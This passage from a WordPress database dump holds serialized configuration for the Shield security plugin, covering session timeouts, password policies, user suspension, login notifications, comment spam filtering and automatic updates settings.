Allows you to better control user sessions on your site and expire idle sessions and prevent account sharing.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:17:\"section_passwords\";s:4:\"reqs\";a:1:{s:6:\"wp_min\";s:3:\"4.4\";}s:5:\"title\";s:17:\"Password Policies\";s:11:\"title_short\";s:17:\"Password Policies\";s:7:\"summary\";a:2:{i:0;s:69:\"Purpose - Have full control over passwords used by users on the site.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:4:{s:4:\"slug\";s:15:\"section_suspend\";s:5:\"title\";s:36:\"Automatic And Manual User Suspension\";s:11:\"title_short\";s:15:\"User Suspension\";s:7:\"summary\";a:2:{i:0;s:75:\"Purpose - Automatically suspend accounts to prevent login by certain users.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:3;a:4:{s:4:\"slug\";s:32:\"section_admin_login_notification\";s:5:\"title\";s:24:\"Admin Login Notification\";s:11:\"title_short\";s:13:\"Notifications\";s:7:\"summary\";a:2:{i:0;s:125:\"Purpose - So you can be made aware of when a WordPress administrator has logged into your site when you are not expecting it.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:4;a:4:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:5:\"title\";s:30:\"Enable Module: User Management\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:148:\"Purpose - User Management offers real user sessions, finer control over user session time-out, and ensures users have logged-in in a correct manner.\";i:1;s:60:\"Recommendation - Keep the User Management feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:19:{i:0;a:9:{s:3:\"key\";s:22:\"enable_user_management\";s:7:\"section\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/e3\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Enable User Management\";s:7:\"summary\";s:46:\"Enable (or Disable) The User Management module\";s:11:\"description\";s:74:\"Un-Checking this option will completely disable the User Management module\";}i:1;a:11:{s:3:\"key\";s:36:\"enable_user_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:7:\"premium\";b:1;s:9:\"sensitive\";b:0;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/e2\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:29:\"User Login Notification Email\";s:7:\"summary\";s:58:\"Send Email Notification To Each User Upon Successful Login\";s:11:\"description\";s:85:\"A notification is sent to each user when a successful login occurs for their account.\";}i:2;a:10:{s:3:\"key\";s:37:\"enable_admin_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Admin Login Notification Email\";s:7:\"summary\";s:53:\"Send An Notification Email When Administrator Logs In\";s:11:\"description\";s:168:\"If you would like to be notified every time an administrator user logs into this WordPress site, enter a notification email address. No email address - No Notification.\";}i:3;a:10:{s:3:\"key\";s:24:\"session_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:2;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Session Timeout\";s:7:\"summary\";s:65:\"Specify How Many Days After Login To Automatically Force Re-Login\";s:11:\"description\";s:75:\"WordPress default is 2 days, or 14 days if you check the \'Remember Me\' box.\";}i:4;a:10:{s:3:\"key\";s:29:\"session_idle_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:48;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:70:\"https://icontrolwp.freshdesk.com/support/solutions/articles/3000070590\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Idle Timeout\";s:7:\"summary\";s:68:\"Specify How Many Hours After Inactivity To Automatically Logout User\";s:11:\"description\";s:157:\"If the user is inactive for the number of hours specified, they will be forcefully logged out next time they return. Set this to \'0\' to turn off this option.\";}i:5;a:9:{s:3:\"key\";s:21:\"session_lock_location\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Lock To Location\";s:7:\"summary\";s:34:\"Locks A User Session To IP address\";s:11:\"description\";s:211:\"When selected, a session is restricted to the same IP address as when the user logged in. If a logged-in user\'s IP address changes, the session will be invalidated and they\'ll be forced to re-login to WordPress.\";}i:6;a:10:{s:3:\"key\";s:33:\"session_username_concurrent_limit\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Max Simultaneous Sessions\";s:7:\"summary\";s:49:\"Limit Simultaneous Sessions For The Same Username\";s:11:\"description\";s:137:\"The number provided here is the maximum number of simultaneous, distinct, sessions allowed for any given username. Use \'0\' for no limits.\";}i:7;a:9:{s:3:\"key\";s:24:\"enable_password_policies\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:18:\"https://icwp.io/e1\";s:9:\"link_blog\";s:18:\"https://icwp.io/c4\";s:4:\"name\";s:24:\"Enable Password Policies\";s:7:\"summary\";s:34:\"Enable The Password Policies Below\";s:11:\"description\";s:34:\"Turn on/off all password policies.\";}i:8;a:9:{s:3:\"key\";s:18:\"pass_prevent_pwned\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:18:\"https://icwp.io/by\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Prevent Pwned Passwords\";s:7:\"summary\";s:30:\"Prevent Use Of Pwned Passwords\";s:11:\"description\";s:94:\"Prevents users from using any passwords found on the public available list of pwned passwords.\";}i:9;a:10:{s:3:\"key\";s:15:\"pass_min_length\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"12\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Minimum Length\";s:7:\"summary\";s:23:\"Minimum Password Length\";s:11:\"description\";s:79:\"All passwords that a user sets must be at least this many characters in length.\";}i:10;a:11:{s:3:\"key\";s:17:\"pass_min_strength\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:1:\"4\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:9:\"Very Weak\";}i:1;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Weak\";}i:2;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:6:\"Strong\";}i:4;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:11:\"Very Strong\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Minimum Strength\";s:7:\"summary\";s:25:\"Minimum Password Strength\";s:11:\"description\";s:63:\"All passwords that a user sets must meet this minimum strength.\";}i:11;a:10:{s:3:\"key\";s:19:\"pass_force_existing\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Apply To Existing Users\";s:7:\"summary\";s:61:\"Apply Password Policies To Existing Users and Their Passwords\";s:11:\"description\";s:104:\"Forces existing users to update their passwords if they don\'t meet requirements, after they next login .\";}i:12;a:11:{s:3:\"key\";s:11:\"pass_expire\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Password Expiration\";s:7:\"summary\";s:37:\"Passwords Expire After This Many Days\";s:11:\"description\";s:81:\"Users will be forced to reset their passwords after the number of days specified.\";}i:13;a:10:{s:3:\"key\";s:14:\"manual_suspend\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:18:\"https://icwp.io/fq\";s:9:\"link_blog\";s:18:\"https://icwp.io/fr\";s:4:\"name\";s:28:\"Allow Manual User Suspension\";s:7:\"summary\";s:47:\"Manually Suspend User Accounts To Prevent Login\";s:11:\"description\";s:58:\"Users may be suspended by administrators to prevent login.\";}i:14;a:10:{s:3:\"key\";s:13:\"auto_password\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:18:\"https://icwp.io/fs\";s:9:\"link_blog\";s:18:\"https://icwp.io/fr\";s:4:\"name\";s:30:\"Auto-Suspend Expired Passwords\";s:7:\"summary\";s:50:\"Automatically Suspend Users With Expired Passwords\";s:11:\"description\";s:63:\"Suspend login by users and require password reset to unsuspend.\";}i:15;a:11:{s:3:\"key\";s:14:\"auto_idle_days\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:9:\"link_info\";s:18:\"https://icwp.io/ft\";s:9:\"link_blog\";s:18:\"https://icwp.io/fr\";s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:16;a:10:{s:3:\"key\";s:15:\"auto_idle_roles\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:9:\"link_info\";s:18:\"https://icwp.io/ft\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:17;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:18;a:5:{s:3:\"key\";s:22:\"hard_suspended_userids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:3:{s:29:\"pwned_api_url_password_single\";s:45:\"https://api.pwnedpasswords.com/pwnedpassword/\";s:28:\"pwned_api_url_password_range\";s:37:\"https://api.pwnedpasswords.com/range/\";s:6:\"events\";a:11:{s:16:\"session_notfound\";a:0:{}s:15:\"session_expired\";a:0:{}s:12:\"session_idle\";a:0:{}s:14:\"session_iplock\";a:0:{}s:19:\"session_browserlock\";a:0:{}s:18:\"session_unverified\";a:0:{}s:16:\"password_expired\";a:0:{}s:28:\"password_policy_force_change\";a:1:{s:6:\"recent\";b:1;}s:21:\"password_policy_block\";a:1:{s:6:\"recent\";b:1;}s:19:\"user_hard_suspended\";a:1:{s:6:\"recent\";b:1;}s:21:\"user_hard_unsuspended\";a:0:{}}}s:10:\"meta_modts\";i:1572181753;}'),(33632,1,'shield_mod_config_24802ba5b5c08a1afe310d63641d3e78','a:7:{s:4:\"slug\";s:15:\"comments_filter\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"comments_filter\";s:4:\"name\";s:13:\"Comments SPAM\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:14:\"commentsfilter\";s:7:\"tagline\";s:42:\"Block comment SPAM and retain your privacy\";s:12:\"use_sessions\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:50;}s:13:\"admin_notices\";a:1:{s:15:\"akismet-running\";a:4:{s:2:\"id\";s:15:\"akismet-running\";s:12:\"plugin_admin\";s:3:\"yes\";s:16:\"plugin_page_only\";b:1;s:4:\"type\";s:7:\"warning\";}}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:42:\"section_bot_comment_spam_protection_filter\";s:5:\"title\";s:44:\"Automatic Bot Comment SPAM Protection Filter\";s:11:\"title_short\";s:8:\"Bot SPAM\";s:7:\"primary\";b:1;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Blocks 100% of all automated bot-generated comment SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:17:\"section_recaptcha\";s:5:\"title\";s:16:\"Google reCAPTCHA\";s:11:\"title_short\";s:9:\"reCAPTCHA\";s:7:\"summary\";a:3:{i:0;s:53:\"Purpose - Adds Google reCAPTCHA to the Comment Forms.\";i:1;s:37:\"Recommendation - Keep this turned on.\";i:2;s:109:\"Note - You will need to register for Google reCAPTCHA keys and store them in the Shield \'Dashboard\' settings.\";}}i:2;a:4:{s:4:\"slug\";s:25:\"section_human_spam_filter\";s:5:\"title\";s:36:\"Human Comment SPAM Protection Filter\";s:11:\"title_short\";s:10:\"Human SPAM\";s:7:\"summary\";a:2:{i:0;s:78:\"Purpose - Uses a 3rd party SPAM dictionary to detect human-based comment SPAM.\";i:1;s:176:\"Recommendation - Use of this feature is highly recommend.This tool, unlike other SPAM tools such as Akismet, will not send your comment data to 3rd party services for analysis.\";}}i:3;a:4:{s:4:\"slug\";s:31:\"section_bot_comment_spam_common\";s:5:\"title\";s:37:\"Common Settings For All SPAM Scanning\";s:11:\"title_short\";s:15:\"Common Settings\";s:7:\"summary\";a:1:{i:0;s:59:\"Purpose - Settings that apply to all comment SPAM scanning.\";}}i:4;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:5;a:4:{s:4:\"slug\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:5:\"title\";s:39:\"Enable Module: Comments SPAM Protection\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:126:\"Purpose - The Comments Filter can block 100% of automated spam bots and also offer the option to analyse human-generated spam.\";i:1;s:60:\"Recommendation - Keep the Comments Filter feature turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:16:{i:0;a:9:{s:3:\"key\";s:22:\"enable_comments_filter\";s:7:\"section\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/3z\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf04\";s:4:\"name\";s:22:\"Enable SPAM Protection\";s:7:\"summary\";s:55:\"Enable (or Disable) The Comments SPAM Protection module\";s:11:\"description\";s:83:\"Un-Checking this option will completely disable the Comments SPAM Protection module\";}i:1;a:10:{s:3:\"key\";s:25:\"trusted_commenter_minimum\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"default\";i:1;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/fu\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Trusted Commenter Minimum\";s:7:\"summary\";s:63:\"Minimum Number Of Approved Comments Before Commenter Is Trusted\";s:11:\"description\";s:117:\"Specify how many approved comments must exist before a commenter is trusted and their comments are no longer scanned.\";}i:2;a:10:{s:3:\"key\";s:18:\"trusted_user_roles\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:18:\"https://icwp.io/fu\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Trusted Users\";s:7:\"summary\";s:54:\"Don\'t Scan Comments For Users With The Following Roles\";s:11:\"description\";s:124:\"Shield doesn\'t normally scan comments from logged-in or registered users. Specify user roles here that shouldn\'t be scanned.\";}i:3;a:9:{s:3:\"key\";s:31:\"enable_comments_gasp_protection\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/3n\";s:9:\"link_blog\";s:18:\"https://icwp.io/2n\";s:4:\"name\";s:15:\"GASP Protection\";s:7:\"summary\";s:22:\"Block Bot Comment SPAM\";s:11:\"description\";s:121:\"Taking the lead from the original GASP plugin for WordPress, we have extended it to include advanced spam-bot protection.\";}i:4;a:10:{s:3:\"key\";s:26:\"comments_cooldown_interval\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";i:10;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/3o\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Comments Cooldown\";s:7:\"summary\";s:61:\"Limit posting comments to X seconds after the page has loaded\";s:11:\"description\";s:109:\"By forcing a comments cooldown period, you restrict a Spambot\'s ability to post multiple times to your posts.\";}i:5;a:10:{s:3:\"key\";s:32:\"comments_default_action_spam_bot\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:4:\"spam\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";i:0;s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:9:\"link_info\";s:18:\"https://icwp.io/6j\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Default SPAM Action\";s:7:\"summary\";s:53:\"How To Categorise Comments When Identified To Be SPAM\";s:11:\"description\";s:118:\"When a comment is detected as being SPAM from an automatic bot, the comment will be categorised based on this setting.\";}i:6;a:9:{s:3:\"key\";s:33:\"enable_comments_human_spam_filter\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/57\";s:9:\"link_blog\";s:18:\"https://icwp.io/9w\";s:4:\"name\";s:17:\"Human SPAM Filter\";s:7:\"summary\";s:48:\"Enable (or Disable) The Human SPAM Filter module\";s:11:\"description\";s:145:\"Scans the content of WordPress comments for keywords that are indicative of SPAM and marks the comment according to your preferred setting below.\";}i:7;a:10:{s:3:\"key\";s:39:\"enable_comments_human_spam_filter_items\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:6:{i:0;s:11:\"author_name\";i:1;s:12:\"author_email\";i:2;s:15:\"comment_content\";i:3;s:3:\"url\";i:4;s:10:\"ip_address\";i:5;s:10:\"user_agent\";}s:13:\"value_options\";a:6:{i:0;a:2:{s:9:\"value_key\";s:11:\"author_name\";s:4:\"text\";s:11:\"Author Name\";}i:1;a:2:{s:9:\"value_key\";s:12:\"author_email\";s:4:\"text\";s:12:\"Author Email\";}i:2;a:2:{s:9:\"value_key\";s:15:\"comment_content\";s:4:\"text\";s:15:\"Comment Content\";}i:3;a:2:{s:9:\"value_key\";s:3:\"url\";s:4:\"text\";s:3:\"URL\";}i:4;a:2:{s:9:\"value_key\";s:10:\"ip_address\";s:4:\"text\";s:10:\"IP Address\";}i:5;a:2:{s:9:\"value_key\";s:10:\"user_agent\";s:4:\"text\";s:18:\"Browser User Agent\";}}s:9:\"link_info\";s:18:\"https://icwp.io/58\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Comment Filter Items\";s:7:\"summary\";s:33:\"Select The Items To Scan For SPAM\";s:11:\"description\";s:108:\"When a user submits a comment, only the selected parts of the comment data will be scanned for SPAM content.\";}i:8;a:8:{s:3:\"key\";s:34:\"comments_default_action_human_spam\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";i:0;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";i:0;s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:4:\"name\";s:19:\"Default SPAM Action\";s:7:\"summary\";s:54:\"How To Categorise Comments When Identified To Be SPAM\'\";s:11:\"description\";s:119:\"When a comment is detected as being SPAM from a human commenter, the comment will be categorised based on this setting.\";}i:9;a:9:{s:3:\"key\";s:32:\"enable_google_recaptcha_comments\";s:7:\"section\";s:17:\"section_recaptcha\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:21:\"https://icwp.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Google reCAPTCHA\";s:7:\"summary\";s:36:\"Enable Google reCAPTCHA For Comments\";s:11:\"description\";s:71:\"Use Google reCAPTCHA on the comments form to prevent bot-spam comments.\";}i:10;a:11:{s:3:\"key\";s:31:\"google_recaptcha_style_comments\";s:7:\"section\";s:17:\"section_recaptcha\";s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:1;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:2;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:3;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:18:\"https://icwp.io/e4\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"reCAPTCHA Style\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible Recaptcha.\";}i:11;a:10:{s:3:\"key\";s:30:\"comments_token_expire_interval\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";i:600;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/3o\";s:9:\"link_blog\";s:18:\"https://icwp.io/9v\";s:4:\"name\";s:20:\"Comment Token Expire\";s:7:\"summary\";s:54:\"A visitor has X seconds within which to post a comment\";s:11:\"description\";s:209:\"Default: 600 seconds (10 minutes). Each visitor is given a unique \'Token\' so they can comment. This restricts spambots, but we need to force these tokens to expire and at the same time not bother the visitors.\";}i:12;a:10:{s:3:\"key\";s:23:\"custom_message_checkbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Custom Checkbox Message\";s:7:\"summary\";s:63:\"If you want a custom checkbox message, please provide this here\";s:11:\"description\";s:50:\"You can customise the message beside the checkbox.\";}i:13;a:10:{s:3:\"key\";s:20:\"custom_message_alert\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Custom Alert Message\";s:7:\"summary\";s:60:\"If you want a custom alert message, please provide this here\";s:11:\"description\";s:101:\"This alert message is displayed when a visitor attempts to submit a comment without checking the box.\";}i:14;a:10:{s:3:\"key\";s:27:\"custom_message_comment_wait\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Custom Wait Message\";s:7:\"summary\";s:74:\"If you want a custom submit-button wait message, please provide this here.\";s:11:\"description\";s:111:\"Where you see the \'%s\' this will be the number of seconds. You must ensure you include 1, and only 1, of these.\";}i:15;a:10:{s:3:\"key\";s:29:\"custom_message_comment_reload\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Custom Reload Message\";s:7:\"summary\";s:90:\"If you want a custom message when the comment token has expired, please provide this here.\";s:11:\"description\";s:81:\"This message is displayed on the submit-button when the comment token is expired.\";}}s:11:\"definitions\";a:4:{s:24:\"url_spam_blacklist_terms\";s:89:\"https://raw.githubusercontent.com/splorp/wordpress-comment-blacklist/master/blacklist.txt\";s:34:\"spambot_comments_filter_table_name\";s:23:\"spambot_comments_filter\";s:37:\"spambot_comments_filter_table_columns\";a:6:{i:0;s:2:\"id\";i:1;s:7:\"post_id\";i:2;s:12:\"unique_token\";i:3;s:2:\"ip\";i:4;s:10:\"created_at\";i:5;s:10:\"deleted_at\";}s:6:\"events\";a:3:{s:14:\"spam_block_bot\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:20:\"spam_block_recaptcha\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:16:\"spam_block_human\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1572181749;}'),(33633,1,'shield_mod_config_689e7e99547c15bd9c1aa9560cb52dba','a:6:{s:4:\"slug\";s:11:\"autoupdates\";s:10:\"properties\";a:13:{s:4:\"slug\";s:11:\"autoupdates\";s:4:\"name\";s:17:\"Automatic Updates\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"autoupdates\";s:7:\"tagline\";s:53:\"Take back full control of WordPress automatic updates\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:60;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"primary\";b:1;s:5:\"title\";s:42:\"Automatic Updates For WordPress Components\";s:11:\"title_short\";s:20:\"WordPress Components\";s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Control how automatic updates for each WordPress component is handled.\";i:1;s:80:\"Recommendation - You should at least allow minor updates for the WordPress core.\";}}i:1;a:4:{s:4:\"slug\";s:15:\"section_options\";s:5:\"title\";s:19:\"Auto-Update Options\";s:11:\"title_short\";s:19:\"Auto-Update Options\";s:7:\"summary\";s:77:\"Purpose - Make adjustments to how automatic updates are handled on your site.\";}i:2;a:4:{s:4:\"slug\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:5:\"title\";s:32:\"Enable Module: Automatic Updates\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:137:\"Purpose - Automatic Updates lets you manage the WordPress automatic updates engine so you choose what exactly gets updated automatically.\";i:1;s:62:\"Recommendation - Keep the Automatic Updates feature turned 